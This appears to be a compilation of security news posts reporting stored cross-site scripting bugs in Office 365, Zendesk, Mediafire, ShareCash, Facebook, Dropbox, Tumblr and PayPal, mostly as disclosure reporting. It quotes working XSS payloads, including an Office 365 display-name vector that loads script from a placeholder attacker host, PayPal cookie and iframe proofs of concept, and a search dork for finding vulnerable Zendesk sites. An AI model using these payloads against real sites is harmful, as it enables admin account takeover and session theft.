Persistent XSS Vulnerability in Office 365 website allows to hack Admin account



Cogmotive firm has discovered a potentially critical persistent cross site scripting(XSS) vulnerability in the Office 365 - a cloud version of office.  A successful exploitation allows attacker to take control of the administrator account.

To exploit this vulnerability, you have to be one of the user.  A malicious employee can change their own Display name to XSS vectors.

For instance, an attacker can modify his display name to the following script:
/*-->]]>%>?></object></script></title></textarea></noscript></style></xmp>'-/"///><img id="b1" src=1 onerror='$.getScript("https://[attacker_website]/exploit/b.js", function() { c(); });'>'
User administration page usually display the list of users in the portal.  So, if an user changes his name, it will be reflected in that page.

When an admin user log into the portal and access the "User administration" page, the payload will get executed.  It will load the malicious javascript file hosted in attacker's server and execute.

An attacker can exploit this vulnerability to create administrator within the company’s Office 365 environment.

"It is worth noting that this weakness seems to have been introduced recently within the new Wave 15 version of Office 365." Alan Byrne, Co-founder of Cogmotive said in company's blog.

Alan immediately reported the bug to Microsoft on October 2013.  On December 2013, Microsoft patched the vulnerability.




Persistent XSS vulnerability in Zendesk Support Ticket System

An Information Security Researcher, Sukhwinder Singh, has identified a critical security flaw in one of the top Support ticket system provided by Zendesk.

The title field is vulnerable to Persistent Cross site scripting.   The researcher managed to create a ticket with this title : "><script>alert(/Sukhwinder Singh/)</script>.  

Even though the Developer of this app managed to sanitize the title before being displayed in the user end, he stored the title in the database without sanitizing.

The title is being sanitized every time it is being displayed in the page.  Unfortunately, they failed to remove the special characters before displaying the title in data-text attribute of Twitter_button code.


POC:
https://support.zuora.com/entries/23275787--script-alert-Sukhwinder-Singh-script-

The google dork "Support Ticket System by Zendesk" returns thousands of websites that use this application.

The researcher claimed to have contacted the Zendesk but there is response from their side.  I've also sent notification to Zendesk. 

File Upload XSS Vulnerability in Mediafire

An Information Security Researcher , Mahadev Subedi, from coolpokharacity.com has claimed to have discovered a Persistent Cross site scripting vulnerability in the Mediafire website(mediafire.com)

It seems like the vulnerability exists in the File uploading feature in the Mediafire.  The developers fails to sanitize the file name of the uploaded file.

Persistent xss vulnerability in Mediafire

"Whenever we upload file names containing encoded or decoded malicious XSS codes, it results in Cross Site Scripting ." The researcher said in the email.

For instance, if you create a file name with this code and upload it , it results in xss: 
"><img src=x onerror=alert(1)>.jpg.txt
Recently A security Researcher Frans Rosén discovered similar kind of vulnerability in the DropBox .

Sharecash vulnerable to Persistent Cross Site Scripting vulnerability

Security Researcher, Rafay Baloch, the founder of Rafay Hacking Articles,  has discovered a Cross Site scripting (XSS) Vulnerability in ShareCash website(sharecash.org). ShareCash is the highest paying Pay-Per-Download network around.

The vulnerability affects the  "Manage Widget" page of ShareCash.  The XSS vulnerability found to be stored one.

Stored XSS Vulnerability

Stored XSS is critical one since the script is being stored on the server and is being executed every time user visits the affected page.

In an Email Sent to EHN, Researcher provided the screenshot of the Proof-of-concept.  From the POC, I come to know that the "Widget Name" is vulnerable to xss attack.  It seems like the developer fails to validate the input.

Rafay claimed that he sent more than 10 emails to share cash to notify them about the vulnerability, but they failed to respond.

Stored XSS vulnerability in Facebook and researcher got $3,500 Bug Bounty

A security Researcher Frans Rosén has discovered Cross Site Scripting vulnerability in Facebook and DropBox.

Initially , the researcher was working on finding security flaws on DropBox.  He noticed that when using their web interface there were some restrictions on what filenames that were allowed.  He tried to rename the file with '"><img src=x onerror=alert(document.domain)>.txt  But he got error message that some special characters are not allowed.

"But, if you instead, connected a local directory, created a file there and synced it, you got it inside Dropbox without any problems."The researcher explained in his blog. "Using this method I was able to find two issues with their notification messages showing unescaped filenames."

He notified DropBox about the vulnerability and they have successfully patched the flaw.

After some time, he noticed that there is connection between DropBox and Facebook. You can add files directly from DropBox to your Facebook groups. So he was curious to test the vulnerability in Facebook also.



In his Facebook group, he tried to add the previously uploaded file in the DropBox.  After he posted in the group, the xss attack didn't work.  But when he clicked the 'Share' link in the post, he got alert message.  Yes, Successfully, he managed to run the Script in Facebook.  The XSS also worked when he shared the crafted pin from the Pinterest.

Researcher got $3,500 USD bug bounty for notifying the vulnerability, facebook fixed the vulnerability now.

Stored XSS vulnerability in Tumblr can be used for Phishing and Malware attack

tumblr stored xss

Recently we reported that the reason behind the Tumblr reblog attack is Stored cross Site scripting(XSS) vulnerability. The vulnerability was discovered by a security researcher Janne Ahlberg. Janne says the vulnerability is not yet fixed.

According to his research, It is possible to embed JavaScript and some other HTML tags to certain Tumblr post types (e.g. video post).

The vulnerability can be used for launching phishing attacks.  For instance,it would be quite easy to ask input from user in various ways. User input could be stored to attackers server. Attacker could push malicious files from his/her server to Tumblr users.

"Attacker could create several Tumblr accounts and start blogging viral or popular videos using well chosen tags. Trust and popularity could be increased by using other accounts for reblogging video posts."Researcher described one possible attack scenario.

"Once the 'attack blog' would have enough followers, attacker could create a malicious post again with carefully selected tags. If the followers would reblog a malicious post, the spreading of payload would start."

Persistent Cross Site Scripting Vulnerability in the official Paypal ecommerce


The Vulnerability Laboratory Research Team discovered a persistent input validation vulnerability in the official Paypal ecommerce website content management system.

The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent). The persistent vulnerability is located in the Artikel pro Seite listing module with the bound vulnerable filterVal1 parameter.

Remote exploitation requires low user inter action or privileged application user account for local exploitation. Successful exploitation of the vulnerability can lead to session hijacking (admin), account steal via persistent web attack or stable (persistent) context manipulation.


Proof of Concept:
=================
The persistent vulnerability can be exploited by remote attackers & local privileged user accounts with low required user inter action.
For demonstration or reproduce ...

Review: [ALL Listing] (index) Rechnungen Verwalten -  Geld Anfordern > Artikel pro Seite (Listing) > filterVal1

var currencyVals = ["EUR", "AUD", "BRL", "GBP", "DKK", "HKD", "ILS", "JPY", "CAD", "MXN", "TWD", "NZD", "NOK", "PHP",
"PLN", "SEK", "CHF", "SGD", "THB", "CZK", "HUF", "USD", ""];
var txt1 = "zwischen";
var txt2 = " und ";
var txtLabel = "Wert 2";
var advFilter = "email";
var dateFilter = "invoice_date";
var filterVal1 = "<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;"> <META HTTP-EQUIV="Set-Cookie"
Content="USERID=<SCRIPT>document.cookie=true</script>"> <script>document.cookie=true;</script>


PoC:  "><iframe src=http://vuln-lab.com onload=alert("VulnerabilityLab") <

The security risk of the persistent script code inject vulnerability is estimated as medium(+).The vulnerability successfully fixed by Paypal.